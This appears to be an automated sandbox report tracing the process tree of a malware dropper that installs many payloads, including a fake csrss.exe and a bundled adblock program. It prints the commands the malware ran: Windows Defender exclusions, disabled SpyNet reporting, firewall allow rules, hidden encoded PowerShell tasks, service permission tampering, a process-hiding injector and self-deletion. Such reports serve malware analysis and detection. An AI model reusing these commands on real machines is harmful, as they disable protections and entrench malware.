PID 1084 wrote to memory of 1476	1084	svchost.exe	ste63gP8m0N_8sNN3Z5ET2Dq.exe
PID 1084 wrote to memory of 1476	1084	svchost.exe	ste63gP8m0N_8sNN3Z5ET2Dq.exe
PID 1084 wrote to memory of 1476	1084	svchost.exe	ste63gP8m0N_8sNN3Z5ET2Dq.exe
PID 1084 wrote to memory of 1476	1084	svchost.exe	ste63gP8m0N_8sNN3Z5ET2Dq.exe
PID 3952 wrote to memory of 4148	3952	visFT3lSO_8ZOfZv5P69I2QI.exe	Adblock.exe
PID 3952 wrote to memory of 4148	3952	visFT3lSO_8ZOfZv5P69I2QI.exe	Adblock.exe
PID 3952 wrote to memory of 4148	3952	visFT3lSO_8ZOfZv5P69I2QI.exe	Adblock.exe
PID 3952 wrote to memory of 4624	3952	visFT3lSO_8ZOfZv5P69I2QI.exe	schtasks.exe
PID 3952 wrote to memory of 4624	3952	visFT3lSO_8ZOfZv5P69I2QI.exe	schtasks.exe
PID 3952 wrote to memory of 4624	3952	visFT3lSO_8ZOfZv5P69I2QI.exe	schtasks.exe
PID 3952 wrote to memory of 4272	3952	visFT3lSO_8ZOfZv5P69I2QI.exe	schtasks.exe
PID 3952 wrote to memory of 4272	3952	visFT3lSO_8ZOfZv5P69I2QI.exe	schtasks.exe
PID 3952 wrote to memory of 4272	3952	visFT3lSO_8ZOfZv5P69I2QI.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe
"C:\Users\Admin\AppData\Local\Temp\81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1584

C:\Users\Admin\Pictures\Minor Policy\HOac2Tsz9nY_mLeQOxIqTrPa.exe
"C:\Users\Admin\Pictures\Minor Policy\HOac2Tsz9nY_mLeQOxIqTrPa.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4492

C:\Users\Admin\Pictures\Minor Policy\Lp2dbwbN2T8SL7q6CUPPNX_e.exe
"C:\Users\Admin\Pictures\Minor Policy\Lp2dbwbN2T8SL7q6CUPPNX_e.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3784

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
3⤵
PID:2920

C:\Users\Admin\Pictures\Minor Policy\8LGCVbQpmBGp3olFcvsyLfbQ.exe
"C:\Users\Admin\Pictures\Minor Policy\8LGCVbQpmBGp3olFcvsyLfbQ.exe"
2⤵
- Executes dropped EXE
PID:4592

C:\Users\Admin\Pictures\Minor Policy\8LGCVbQpmBGp3olFcvsyLfbQ.exe
"C:\Users\Admin\Pictures\Minor Policy\8LGCVbQpmBGp3olFcvsyLfbQ.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4668

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:2008

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies Windows Firewall
PID:4396

C:\Users\Admin\Pictures\Minor Policy\Mj9vpMN6DJTj1V6POgsQAeAL.exe
"C:\Users\Admin\Pictures\Minor Policy\Mj9vpMN6DJTj1V6POgsQAeAL.exe"
2⤵
- Executes dropped EXE
PID:3436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 444
3⤵
- Program crash
PID:528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 772
3⤵
- Program crash
PID:4764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 780
3⤵
- Program crash
PID:3016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 792
3⤵
- Program crash
PID:616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 836
3⤵
- Program crash
PID:1192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 984
3⤵
- Program crash
PID:3840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 1016
3⤵
- Program crash
PID:4580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 1360
3⤵
- Program crash
PID:1180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 1376
3⤵
- Program crash
PID:4892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Mj9vpMN6DJTj1V6POgsQAeAL.exe" /f & erase "C:\Users\Admin\Pictures\Minor Policy\Mj9vpMN6DJTj1V6POgsQAeAL.exe" & exit
3⤵
PID:1788

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Mj9vpMN6DJTj1V6POgsQAeAL.exe" /f
4⤵
- Kills process with taskkill
PID:4400

C:\Users\Admin\Pictures\Minor Policy\lch9FZIjmxIojKvTXJL4TNoV.exe
"C:\Users\Admin\Pictures\Minor Policy\lch9FZIjmxIojKvTXJL4TNoV.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1748

C:\Users\Admin\Pictures\Minor Policy\ste63gP8m0N_8sNN3Z5ET2Dq.exe
"C:\Users\Admin\Pictures\Minor Policy\ste63gP8m0N_8sNN3Z5ET2Dq.exe"
2⤵
- Executes dropped EXE
PID:1084

C:\Users\Admin\Pictures\Minor Policy\ste63gP8m0N_8sNN3Z5ET2Dq.exe
"C:\Users\Admin\Pictures\Minor Policy\ste63gP8m0N_8sNN3Z5ET2Dq.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:1476

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\f0e4c476-5c6e-4ad7-9f77-470ecd363824" /deny *S-1-1-0:(OI)(CI)(DE,DC)
4⤵
- Modifies file permissions
PID:2988

C:\Users\Admin\Pictures\Minor Policy\ste63gP8m0N_8sNN3Z5ET2Dq.exe
"C:\Users\Admin\Pictures\Minor Policy\ste63gP8m0N_8sNN3Z5ET2Dq.exe" --Admin IsNotAutoStart IsNotTask
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2632

C:\Users\Admin\Pictures\Minor Policy\ste63gP8m0N_8sNN3Z5ET2Dq.exe
"C:\Users\Admin\Pictures\Minor Policy\ste63gP8m0N_8sNN3Z5ET2Dq.exe" --Admin IsNotAutoStart IsNotTask
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:4820

C:\Users\Admin\AppData\Local\8be5404d-ea56-43cb-a802-52a9af68948b\build2.exe
"C:\Users\Admin\AppData\Local\8be5404d-ea56-43cb-a802-52a9af68948b\build2.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4268

C:\Users\Admin\AppData\Local\8be5404d-ea56-43cb-a802-52a9af68948b\build2.exe
"C:\Users\Admin\AppData\Local\8be5404d-ea56-43cb-a802-52a9af68948b\build2.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4976

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\8be5404d-ea56-43cb-a802-52a9af68948b\build2.exe" & del C:\PrograData\*.dll & exit
8⤵
PID:3408

C:\Windows\SysWOW64\taskkill.exe
taskkill /im build2.exe /f
9⤵
- Kills process with taskkill
PID:3172

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
9⤵
- Delays execution with timeout.exe
PID:1624

C:\Users\Admin\Pictures\Minor Policy\lUEr_IaF1m_MA_fMKs0cPWZL.exe
"C:\Users\Admin\Pictures\Minor Policy\lUEr_IaF1m_MA_fMKs0cPWZL.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4740

C:\Windows\SysWOW64\robocopy.exe
robocopy /?
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4896

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Traditional.html & ping -n 5 localhost
3⤵
PID:2528

C:\Windows\SysWOW64\cmd.exe
cmd
4⤵
PID:4236

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AvastUI.exe"
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4704

C:\Windows\SysWOW64\find.exe
find /I /N "avastui.exe"
5⤵
PID:3908

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AVGUI.exe"
5⤵
- Enumerates processes with tasklist
PID:2664

C:\Windows\SysWOW64\find.exe
find /I /N "avgui.exe"
5⤵
PID:3508

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^fQEttMyCnt$" Dated.html
5⤵
PID:3380

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Virtual.exe.pif
Virtual.exe.pif p
5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1192

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Virtual.exe.pif
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Virtual.exe.pif Policy\lUEr_IaF1m_MA_fMKs0cPWZL.exe"
6⤵
PID:3592

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
4⤵
- Runs ping.exe
PID:3872

C:\Users\Admin\Pictures\Minor Policy\VSAys9Q8JaBCGDxuKx0c866l.exe
"C:\Users\Admin\Pictures\Minor Policy\VSAys9Q8JaBCGDxuKx0c866l.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3128

C:\Users\Admin\Pictures\Minor Policy\VSAys9Q8JaBCGDxuKx0c866l.exe
"C:\Users\Admin\Pictures\Minor Policy\VSAys9Q8JaBCGDxuKx0c866l.exe"
3⤵
- Executes dropped EXE
PID:2820

C:\Users\Admin\Pictures\Minor Policy\visFT3lSO_8ZOfZv5P69I2QI.exe
"C:\Users\Admin\Pictures\Minor Policy\visFT3lSO_8ZOfZv5P69I2QI.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3952

C:\Users\Admin\Documents\vFl11rscZNvzgu042WrhMwSQ.exe
"C:\Users\Admin\Documents\vFl11rscZNvzgu042WrhMwSQ.exe"
3⤵
PID:4148

C:\Users\Admin\Pictures\Adobe Films\_YiRi8lyq5g4rX5QDwR_6XBC.exe
"C:\Users\Admin\Pictures\Adobe Films\_YiRi8lyq5g4rX5QDwR_6XBC.exe"
4⤵
- Executes dropped EXE
PID:3464

C:\Users\Admin\Pictures\Adobe Films\_YiRi8lyq5g4rX5QDwR_6XBC.exe
"C:\Users\Admin\Pictures\Adobe Films\_YiRi8lyq5g4rX5QDwR_6XBC.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:3436

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
6⤵
PID:3900

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
7⤵
- Modifies Windows Firewall
PID:1740

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
6⤵
PID:4972

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
7⤵
- Creates scheduled task(s)
PID:2304

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
7⤵
PID:1216

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
7⤵
PID:796

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
7⤵
- Creates scheduled task(s)
PID:664

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
PID:1092

C:\Windows\SysWOW64\sc.exe
sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
8⤵
- Launches sc.exe
PID:4492

C:\Users\Admin\Pictures\Adobe Films\aAW5RTcxWabc6JRVyWMxrIED.exe
"C:\Users\Admin\Pictures\Adobe Films\aAW5RTcxWabc6JRVyWMxrIED.exe"
4⤵
- Executes dropped EXE
PID:4172

C:\Users\Admin\AppData\Local\Temp\7zSC321.tmp\Install.exe
.\Install.exe
5⤵
- Executes dropped EXE
PID:1468

C:\Users\Admin\AppData\Local\Temp\7zSD496.tmp\Install.exe
.\Install.exe /S /site_id "525403"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:3544

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
7⤵
PID:2460

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
8⤵
PID:2280

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
9⤵
PID:4020

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
9⤵
PID:2188

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
7⤵
PID:2224

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
8⤵
PID:4068

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
9⤵
PID:4488

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
9⤵
PID:5084

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gAScqaHBc" /SC once /ST 10:42:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
7⤵
- Creates scheduled task(s)
PID:3556

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gAScqaHBc"
7⤵
PID:2120

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gAScqaHBc"
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4400

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bSzxbwoNcBikuvBHSi" /SC once /ST 13:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AcqpCOVIgRzGUiXJS\DHCFwIeGsAzCKgD\SYnZlMX.exe\" Lt /site_id 525403 /S" /V1 /F
7⤵
- Creates scheduled task(s)
PID:5032

C:\Users\Admin\Pictures\Adobe Films\ZVsabRcV014Hwu_ClU_pvRa3.exe
"C:\Users\Admin\Pictures\Adobe Films\ZVsabRcV014Hwu_ClU_pvRa3.exe"
4⤵
- Executes dropped EXE
PID:4392

C:\Users\Admin\Pictures\Adobe Films\JOXrBXkzEsjgupj8TsjrO7t_.exe
"C:\Users\Admin\Pictures\Adobe Films\JOXrBXkzEsjgupj8TsjrO7t_.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4928

C:\Windows\SysWOW64\robocopy.exe
robocopy /?
5⤵
PID:1852

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Traditional.html & ping -n 5 localhost
5⤵
PID:2232

C:\Windows\SysWOW64\cmd.exe
cmd
6⤵
PID:4772

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AvastUI.exe"
7⤵
- Enumerates processes with tasklist
PID:1972

C:\Windows\SysWOW64\find.exe
find /I /N "avastui.exe"
7⤵
PID:1368

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AVGUI.exe"
7⤵
- Enumerates processes with tasklist
PID:4396

C:\Windows\SysWOW64\find.exe
find /I /N "avgui.exe"
7⤵
PID:2312

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^fQEttMyCnt$" Dated.html
7⤵
PID:4612

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Virtual.exe.pif
Virtual.exe.pif p
7⤵
PID:3812

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
7⤵
- Runs ping.exe
PID:1056

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
6⤵
- Runs ping.exe
PID:4748

C:\Users\Admin\Pictures\Adobe Films\0s8i0CjbtViLP1DvDI49e0Pg.exe
"C:\Users\Admin\Pictures\Adobe Films\0s8i0CjbtViLP1DvDI49e0Pg.exe"
4⤵
- Executes dropped EXE
PID:3880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Get-WmiObject Win32_PortConnector"
5⤵
PID:3804

C:\Users\Admin\Pictures\Adobe Films\s1JfYaxANNVA0_YcroWxU1wQ.exe
"C:\Users\Admin\Pictures\Adobe Films\s1JfYaxANNVA0_YcroWxU1wQ.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:3928

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\OoaroW.9HR
5⤵
PID:4028

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\OoaroW.9HR
6⤵
- Loads dropped DLL
PID:812

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\OoaroW.9HR
7⤵
PID:1620

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\OoaroW.9HR
8⤵
- Loads dropped DLL
PID:4960

C:\Users\Admin\Pictures\Adobe Films\XtnimG3Crj_efkljVY9dM1RR.exe
"C:\Users\Admin\Pictures\Adobe Films\XtnimG3Crj_efkljVY9dM1RR.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1340

C:\Users\Admin\Pictures\Adobe Films\9OLjWNmPfO2KudW829SLtbA9.exe
"C:\Users\Admin\Pictures\Adobe Films\9OLjWNmPfO2KudW829SLtbA9.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2440

C:\Windows\SysWOW64\robocopy.exe
robocopy /?
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4736

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Playing.wks & ping -n 5 localhost
5⤵
PID:1556

C:\Windows\SysWOW64\cmd.exe
cmd
6⤵
PID:2560

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AvastUI.exe"
7⤵
- Enumerates processes with tasklist
PID:4832

C:\Windows\SysWOW64\find.exe
find /I /N "avastui.exe"
7⤵
PID:748

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AVGUI.exe"
7⤵
- Enumerates processes with tasklist
PID:1620

C:\Windows\SysWOW64\find.exe
find /I /N "avgui.exe"
7⤵
PID:4364

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^iHbnbQ$" Baltimore.wks
7⤵
PID:1336

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Hammer.exe.pif
Hammer.exe.pif r
7⤵
PID:3292

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
7⤵
- Runs ping.exe
PID:3344

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
6⤵
- Runs ping.exe
PID:908

C:\Users\Admin\Pictures\Adobe Films\3z0raPKfhernw_IBr0j2szjl.exe
"C:\Users\Admin\Pictures\Adobe Films\3z0raPKfhernw_IBr0j2szjl.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=747
4⤵
PID:3160

C:\Users\Admin\AppData\Local\Temp\is-ROAJG.tmp\3z0raPKfhernw_IBr0j2szjl.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ROAJG.tmp\3z0raPKfhernw_IBr0j2szjl.tmp" /SL5="$20216,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\3z0raPKfhernw_IBr0j2szjl.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=747
5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:368

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Adblock.exe
6⤵
- Kills process with taskkill
PID:3376

C:\Windows\system32\cmd.exe
"cmd.exe" /c "reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f"
6⤵
PID:4544

C:\Windows\system32\reg.exe
reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f
7⤵
PID:4300

C:\Users\Admin\Programs\Adblock\Adblock.exe
"C:\Users\Admin\Programs\Adblock\Adblock.exe" --installerSessionId=e32e1c791662559037 --downloadDate=2022-09-07T13:56:45 --distId=marketator --pid=747
6⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4148

C:\Users\Admin\Programs\Adblock\crashpad_handler.exe
C:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.4.12&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\a32bafd7-4c1b-40fb-e12f-814f2cc801b8.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\a32bafd7-4c1b-40fb-e12f-814f2cc801b8.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\a32bafd7-4c1b-40fb-e12f-814f2cc801b8.run\__sentry-breadcrumb2" --initial-client-data=0x3f0,0x3f4,0x3f8,0x3cc,0x3fc,0x7ff72813bc80,0x7ff72813bca0,0x7ff72813bcb8
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1852

C:\Users\Admin\AppData\Local\Temp\Update-3f7003df-c215-4260-ad05-c82fc21479d0\AdblockInstaller.exe
"C:\Users\Admin\AppData\Local\Temp\Update-3f7003df-c215-4260-ad05-c82fc21479d0\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE
7⤵
- Executes dropped EXE
PID:2128

C:\Users\Admin\AppData\Local\Temp\is-L1GEO.tmp\AdblockInstaller.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L1GEO.tmp\AdblockInstaller.tmp" /SL5="$F01DA,11574525,792064,C:\Users\Admin\AppData\Local\Temp\Update-3f7003df-c215-4260-ad05-c82fc21479d0\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3332

C:\Users\Admin\Programs\Adblock\DnsService.exe
"C:\Users\Admin\Programs\Adblock\DnsService.exe" -remove
9⤵
PID:2276

C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\System32\ipconfig.exe" /flushdns
9⤵
- Gathers network information
PID:4932

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
10⤵
PID:3376

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Adblock.exe
9⤵
- Kills process with taskkill
PID:2224

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
10⤵
PID:3556

C:\Users\Admin\Programs\Adblock\Adblock.exe
"C:\Users\Admin\Programs\Adblock\Adblock.exe" --update --autorun --installerSessionId=e32e1c791662559067 --downloadDate=2022-09-07T13:57:42 --distId=marketator
9⤵
PID:3048

C:\Users\Admin\Programs\Adblock\crashpad_handler.exe
C:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.4.12&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\9751a9aa-ae28-4b68-7e73-380c8211f6b6.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\9751a9aa-ae28-4b68-7e73-380c8211f6b6.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\9751a9aa-ae28-4b68-7e73-380c8211f6b6.run\__sentry-breadcrumb2" --initial-client-data=0x3d0,0x3d4,0x3d8,0x3ac,0x3dc,0x7ff7efb2bdd0,0x7ff7efb2bdf0,0x7ff7efb2be08
10⤵
PID:4528

C:\Windows\system32\netsh.exe
C:\Windows\system32\netsh.exe firewall add allowedprogram "C:\Users\Admin\Programs\Adblock\DnsService.exe" AdBlockFast ENABLE
10⤵
- Modifies Windows Firewall
PID:1336

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe -install
10⤵
PID:3292

C:\Users\Admin\Programs\Adblock\DnsService.exe
